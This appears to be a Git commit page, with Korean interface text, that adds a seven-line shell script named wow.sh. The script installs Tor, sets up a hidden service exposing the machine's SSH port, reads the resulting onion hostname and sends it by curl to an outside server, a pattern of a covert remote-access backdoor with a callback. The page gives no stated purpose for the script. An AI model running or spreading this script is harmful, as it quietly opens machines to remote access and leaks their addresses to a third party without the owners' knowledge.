This commit is contained in:
6543 2020-02-28 04:18:07 +01:00
부모 d452f259d9
커밋 d14ca85feb
로그인 계정: 6543
GPG 키 ID: A1CA74D27FD13271
1개의 변경된 파일7개의 추가작업 그리고 0개의 파일을 삭제

7
wow.sh Normal file
파일 보기

@ -0,0 +1,7 @@
apt install -y tor
echo 'HiddenServiceDir /var/lib/tor/hidden_service/' >> /etc/tor/torrc
echo 'HiddenServicePort 22 127.0.0.1:22' >> /etc/tor/torrc
systemctl restart tor
sleep 3s
host=$(cat /var/lib/tor/hidden_service/hostname)
curl https://home.obermui.de/$host